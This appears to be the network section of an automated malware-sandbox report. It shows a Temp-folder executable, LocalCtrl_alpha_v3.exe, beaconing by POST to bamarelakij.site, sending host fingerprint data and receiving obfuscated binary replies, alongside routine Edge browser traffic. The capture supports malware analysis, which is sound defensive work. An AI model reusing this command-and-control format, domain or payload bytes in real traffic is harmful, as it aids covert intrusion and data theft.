Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 14:42:21.071046114 CET | 1.1.1.1 | 192.168.2.7 | 0xf30 | No error (0) | bamarelakij.site | | 104.21.80.52 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:21.071046114 CET | 1.1.1.1 | 192.168.2.7 | 0xf30 | No error (0) | bamarelakij.site | | 172.67.174.91 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:31.498169899 CET | 1.1.1.1 | 192.168.2.7 | 0x5227 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:31.498200893 CET | 1.1.1.1 | 192.168.2.7 | 0x9dc2 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:31.592683077 CET | 1.1.1.1 | 192.168.2.7 | 0xff15 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:31.592683077 CET | 1.1.1.1 | 192.168.2.7 | 0xff15 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:31.593121052 CET | 1.1.1.1 | 192.168.2.7 | 0x4a77 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:32.703454018 CET | 1.1.1.1 | 192.168.2.7 | 0x9e10 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:32.703622103 CET | 1.1.1.1 | 192.168.2.7 | 0xeb94 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.605789900 CET | 1.1.1.1 | 192.168.2.7 | 0x6ae4 | No error (0) | sb.scorecardresearch.com | | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.605789900 CET | 1.1.1.1 | 192.168.2.7 | 0x6ae4 | No error (0) | sb.scorecardresearch.com | | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.605789900 CET | 1.1.1.1 | 192.168.2.7 | 0x6ae4 | No error (0) | sb.scorecardresearch.com | | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.605789900 CET | 1.1.1.1 | 192.168.2.7 | 0x6ae4 | No error (0) | sb.scorecardresearch.com | | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:33.617033958 CET | 1.1.1.1 | 192.168.2.7 | 0xa52 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.617542028 CET | 1.1.1.1 | 192.168.2.7 | 0x44e7 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.625972986 CET | 1.1.1.1 | 192.168.2.7 | 0xe0a | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.626007080 CET | 1.1.1.1 | 192.168.2.7 | 0xbea | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.637319088 CET | 1.1.1.1 | 192.168.2.7 | 0x4f8a | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:33.637399912 CET | 1.1.1.1 | 192.168.2.7 | 0x61b8 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:42:35.773019075 CET | 1.1.1.1 | 192.168.2.7 | 0xba68 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.773019075 CET | 1.1.1.1 | 192.168.2.7 | 0xba68 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.773865938 CET | 1.1.1.1 | 192.168.2.7 | 0x9cf | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:35.775511980 CET | 1.1.1.1 | 192.168.2.7 | 0x6e0b | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.775511980 CET | 1.1.1.1 | 192.168.2.7 | 0x6e0b | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.775551081 CET | 1.1.1.1 | 192.168.2.7 | 0xcb1a | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Jan 9, 2025 14:42:35.782345057 CET | 1.1.1.1 | 192.168.2.7 | 0xba2b | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.782345057 CET | 1.1.1.1 | 192.168.2.7 | 0xba2b | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:42:35.783341885 CET | 1.1.1.1 | 192.168.2.7 | 0xafc5 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
• bamarelakij.site
• chrome.cloudflare-dns.com
• https:
  • c.msn.com
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
• clients2.googleusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49973 | 104.21.80.52 | 443 | 6224 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:21 UTC | 354 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  Content-Length: 147
  Host: bamarelakij.site
2025-01-09 13:42:21 UTC | 147 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 4e 2d f0 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdN-$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:42:22 UTC | 831 | IN | HTTP/1.1 200 OK
  Date: Thu, 09 Jan 2025 13:42:22 GMT
  Transfer-Encoding: chunked
  Connection: close
  pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svpFeyrP8wDVviJpdoarUP64DfvDewVjAKU0SKeM9G8ByHXFj%2B%2BbBsT48xR6uG5hNP4puGZwndf%2FpUfOWjmI4BLV3eFxonMsR5Tse63m7mPZoO%2FsHwTIKVvvE41lFEhQ9YqV"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ff4d9a20f117c9c-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1766&rtt_var=685&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1137&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=b840c12094c3e232&ts=694&x=0"
2025-01-09 13:42:22 UTC | 17 | IN | Data Raw: 63 0d 0a 00 00 00 00 1c 8a 00 00 f5 54 29 07 0d 0a
  Data Ascii: cT)
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: 33 37 63 33 0d 0a 00 00 00 00 56 03 d4 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c d4 02 4e d4 89 08 0a 5c fb d8 5a 90 45 5b 4e d7 d0 6c 1d 03 f5 0b 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f5 0b 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 0d 03 09 0d 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 09 0d fd 57 7f 48 6c 7c b9 b1 17 ec 4c e4 d7 08 6d fa 67 0c 3b 02 15 00 0f 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 3b 02 57 06 36 49 41 a7 98 95 9c ca e8 ee de e4 d6 b8 86 de de d6 d2 ca e6 fb 06 90 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 90 02 48 34 d6 d3 2a f9 e3 d9 a7 07 a0 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 a0 09 ea 76 df 2c 89 bf ea 26 01 0b a2 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 a2 0a 1f 81 c5 a8 bc 19 f4 a3 f4 3a f6
  Data Ascii: 37c3VlLN\ZE[NllW6IAlWHl|Lmg;l;W6IAl1H4*lv,&l:
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: 36 49 41 a7 98 95 e6 ca c6 da de c8 5c c8 c4 11 0b 98 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 98 06 fa 9a f0 97 98 b2 30 98 cc 02 02 0e 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 02 0e da 30 e2 10 b8 f9 d7 1a 35 08 34 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 34 0a 57 06 36 49 41 a7 98 95 c8 d2 e6 c6 de e4 c8 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 06 08 5b 00 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 5b 00 57 06 36 49 41 a7 98 95 54 56 05 3b 0a 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 3b 0a 57 06 36 49 41 a7 98 95 00 50 02 23 08 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 23 08 57 06 36 49 41 a7 98 95 9a d2 c6 e4 de e6 de cc e8 b8 9e ea e8 d8 de de d6 20 00 a8 08 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd
  Data Ascii: 6IA\l0l054l4W6IA@[l[W6IATV;l;W6IAP#l#W6IA l
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: dc ac a0 9c b6 0a b8 04 15 00 1c 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 b8 04 57 06 36 49 41 a7 98 95 c2 e8 de da d2 c6 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 bd 0c d2 0a 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 4c d2 0a 57 06 36 49 41 a7 98 95 44 ca dc c6 e4 f2 e0 e8 ca c8 be d6 ca f2 44 74 44 58 0e e4 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e4 08 74 a8 ff 53 24 61 ca 59 9f 07 a9 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 a9 0d f3 13 76 8f 90 da 43 85 46 0b 90 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 12 90 0a 55 e6 71 be ae 93 9a 88 be 5d 42 12 15 e7 4e c3 b8 06 ac 0b 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 ac 0b 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 8d 00 3a 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04
  Data Ascii: lW6IA@lLW6IADDtDXltS$aYlvCFlUq]BNlW6IA:l
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: 17 15 04 c9 6c 04 c9 b8 48 0b 47 71 56 f0 25 59 96 ff 53 00 c5 01 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 c5 01 57 06 36 49 41 a7 98 95 a6 9e 8c a8 ae 82 a4 8a b8 a8 d2 ce ca e4 ac 9c 86 01 00 2c 00 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 2c 00 57 06 36 49 41 a7 98 95 86 aa a4 a4 8a 9c a8 d1 08 e9 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e9 04 82 87 32 05 e1 4e 07 0f 2c 0e 12 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 12 0f 39 2a b2 22 5b e3 87 28 d3 0b a2 0e 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 a2 0e 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 af 03 e9 0e 15 00 12 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 e9 0e 57 06 36 49 41 a7 98 95 cc de e4 da d0 d2 e6 e8 de e4 f2 5c e6 e2 d8 d2 e8 ca ed 08 a4 0d 15 00 08 00 08 1f 0f 17 15 04
  Data Ascii: lHGqV%YSlW6IA,l,W6IAl2N,l9*"[(lW6IAlW6IA\
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: c8 ce ca 5c ca f0 ca 28 03 13 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 0b 13 09 90 1a 8e 10 93 a1 e9 4e 7a a1 bd bc 28 d5 3d 05 9d 01 2b 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b1 2b 05 c1 d2 5d 0e a3 1b 68 04 55 08 0d 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 0d 0f de b4 9a 63 b8 7d af 69 4f 0b 51 0f 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 51 0f 8e 2c b9 76 bf 66 da b8 01 97 8a da 04 12 0e f3 1b 0f 3f 04 15 00 15 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3f 04 57 06 36 49 41 a7 98 95 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 1b 07 22 00 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c 22 00 88 8c 51 20 82 b3 ae 26 58 02 dd 09 15 00 25 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 dd 09 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6
  Data Ascii: \(lNz(=+l+]hUlc}iOQlQ,vf?l?W6IA\"lL"Q &X%lHW6IA
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: c9 12 fd 01 ed dd 14 dd 8f f5 d4 d2 bb 03 d3 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 d3 04 66 c3 c8 8d 05 0a fd 87 91 08 e0 03 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 f9 e0 03 8b 9b 77 43 e8 52 42 49 ce 0a 41 04 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd d8 41 04 ab 3b 9f 71 44 8a ad 27 24 80 ac dd ff fe 79 6c 84 05 73 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 73 06 6e 68 98 7e 0d a1 ad 74 2f 06 6d 03 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 6d 03 a3 25 be e4 09 f7 b9 f4 48 9e 8d 48 b2 83 6d bf 6c 05 8c 03 15 00 04 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8c 03 57 06 36 49 41 a7 98 95 98 9e 86 96 b6 07 2f 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 2f 09 93 2e 93 85 52 c9 02 e0 79 95 a0 29 e9 bd d6 ab 42 0b e7 02 15 00 08 00 08 1f 0f 17
  Data Ascii: lflwCRBIAlA;qD'$ylslsnh~t/mlm%HHmllW6IA/l/.Ry)B
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: 2e c2 65 cb 4d 0b 50 c1 af 0a 87 0e 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 87 0e 57 06 36 49 41 a7 98 95 54 eb 0b ff 01 15 00 2d 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 ff 01 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6 86 a0 b8 92 dc d2 be 8c d2 d8 ca e6 b8 d8 de c6 c2 d8 82 e0 e0 88 c2 e8 c2 a0 e4 de ce e4 c2 da e6 5c d2 dc d2 68 06 8d 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 8d 09 93 20 7d 30 f1 08 bd 3f 4c 03 b6 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c b6 0b 5c 2d 31 21 fe ac 26 0e 79 02 c4 00 15 00 1b 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 c4 00 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 84 d2 e8 c6 de d2 dc 86 de e4 ca b8 ee c2 d8 d8 ca e8 e6 3a 08 ee 08 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 ee 08 57 06 36 49 41 a7 98 95
  Data Ascii: .eMPlW6IAT-lHW6IA\hl }0?LlL\-1!&ylW6IA:lHW6IA
2025-01-09 13:42:22 UTC | 1369 | IN | Data Raw: 04 c9 6c 04 c9 d8 6c 0f 42 9b ba 7b 25 52 8f 71 0f 04 2d 06 15 00 17 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 2d 06 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 86 de d2 dc de da d2 b8 ee c2 d8 d8 ca e8 e6 6f 0e 8d 02 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8d 02 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 e3 04 82 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 82 05 cc 3f a5 88 ae f6 90 82 36 0a 48 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 48 0a 57 06 36 49 41 a7 98 95 da ca e6 e6 ca dc ce ca e4 e6 b8 88 d2 e6 c6 de e4 c8 b8 a6 e8 c2 c4 d8 ca b8 d6 ca f2 b5 09 3a 00 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 3a 00 57 06 36 49 41 a7 98 95 54 5c d2 dc d2 58 01 07 0c 15 00 58 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 07 0c 57 06 36 49 41 a7 98 95 a6
  Data Ascii: llB{%Rq-l-W6IAolW6IAl?6HlHW6IA:l:W6IAT\XXlW6IA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49974 | 104.21.80.52 | 443 | 6224 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:22 UTC | 434 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
    p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
    Content-Length: 53
    Host: bamarelakij.site
2025-01-09 13:42:22 UTC | 53 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Data Ascii:
2025-01-09 13:42:23 UTC | 754 | IN | HTTP/1.1 200 OK
    Date: Thu, 09 Jan 2025 13:42:23 GMT
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1p3C%2FxXMtcyW8frsPQkMtT8NjfISDjo%2FtJpe9XJzVjlBm6KLB%2FvNJPZFvB65St3dI43%2B%2BKvSKMdS4HfpP9i7B47cv5wbxcoI59K5ntR7Avl%2BrcF0ApLD9Vn85CmBB6%2BYrLH3"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ff4d9aa18af7274-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1818&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1123&delivery_rate=1593886&cwnd=182&unsent_bytes=0&cid=a0bf643277919200&ts=312&x=0"
2025-01-09 13:42:23 UTC | 24 | IN | Data Raw: 31 32 0d 0a 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 90 0d 0a
    Data Ascii: 12
2025-01-09 13:42:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49975 | 104.21.80.52 | 443 | 6224 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:23 UTC | 435 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
    p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
    Content-Length: 208
    Host: bamarelakij.site
2025-01-09 13:42:23 UTC | 208 | OUT | Data Raw: (binary payload, 208 bytes)
2025-01-09 13:42:24 UTC | 815 | IN | HTTP/1.1 204 No Content
    Date: Thu, 09 Jan 2025 13:42:24 GMT
    Connection: close
    pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W57oK5h08WxrQ6PmJyZG%2F99gFH2dbkrBGMB6uHFR%2F5YQxWB%2FLb1H31Ht8PiCJrcfZUslLdjboSuXWY4LmAuG2%2FDW8iO5zKXaF7E9j2W%2BENHTK25vxCWLRO2%2BQntPrWULLBEq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ff4d9af0acdc411-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1686&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1279&delivery_rate=1731909&cwnd=224&unsent_bytes=0&cid=951396d830ff3136&ts=334&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 50012 | 172.64.41.3 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:36 UTC | 245 | OUT | POST /dns-query HTTP/1.1
    Host: chrome.cloudflare-dns.com
    Connection: keep-alive
    Content-Length: 128
    Accept: application/dns-message
    Accept-Language: *
    User-Agent: Chrome
    Accept-Encoding: identity
    Content-Type: application/dns-message
2025-01-09 13:42:36 UTC | 128 | OUT | Data Raw: (binary payload, 128 bytes)
    Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:36 UTC | 247 | IN | HTTP/1.1 200 OK
    Server: cloudflare
    Date: Thu, 09 Jan 2025 13:42:36 GMT
    Content-Type: application/dns-message
    Connection: close
    Access-Control-Allow-Origin: *
    Content-Length: 468
    CF-RAY: 8ff4d9fd0f878c63-EWR
    alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:36 UTC | 468 | IN | Data Raw: (binary payload, 468 bytes)
    Data Ascii: wwwgstaticcom)P)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 50013 | 162.159.61.3 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:36 UTC | 245 | OUT | POST /dns-query HTTP/1.1
    Host: chrome.cloudflare-dns.com
    Connection: keep-alive
    Content-Length: 128
    Accept: application/dns-message
    Accept-Language: *
    User-Agent: Chrome
    Accept-Encoding: identity
    Content-Type: application/dns-message
2025-01-09 13:42:36 UTC | 128 | OUT | Data Raw: (binary payload, 128 bytes)
    Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:36 UTC | 247 | IN | HTTP/1.1 200 OK
    Server: cloudflare
    Date: Thu, 09 Jan 2025 13:42:36 GMT
    Content-Type: application/dns-message
    Connection: close
    Access-Control-Allow-Origin: *
    Content-Length: 468
    CF-RAY: 8ff4d9fcfd1b41bb-EWR
    alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:36 UTC | 468 | IN | Data Raw: (binary payload, 468 bytes)
    Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 50011 | 162.159.61.3 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:36 UTC | 245 | OUT | POST /dns-query HTTP/1.1
    Host: chrome.cloudflare-dns.com
    Connection: keep-alive
    Content-Length: 128
    Accept: application/dns-message
    Accept-Language: *
    User-Agent: Chrome
    Accept-Encoding: identity
    Content-Type: application/dns-message
2025-01-09 13:42:36 UTC | 128 | OUT | Data Raw: (binary payload, 128 bytes)
    Data Ascii: wwwgstaticcom)TP
2025-01-09 13:42:36 UTC | 247 | IN | HTTP/1.1 200 OK
    Server: cloudflare
    Date: Thu, 09 Jan 2025 13:42:36 GMT
    Content-Type: application/dns-message
    Connection: close
    Access-Control-Allow-Origin: *
    Content-Length: 468
    CF-RAY: 8ff4d9fd3d0672c2-EWR
    alt-svc: h3=":443"; ma=86400
2025-01-09 13:42:36 UTC | 468 | IN | Data Raw: (binary payload, 468 bytes)
    Data Ascii: wwwgstaticcom P)


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 50028 | Destination IP: 20.110.205.119 | Destination Port: 443 | PID: 7832 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 1175 | Direction: OUT | Data:
GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
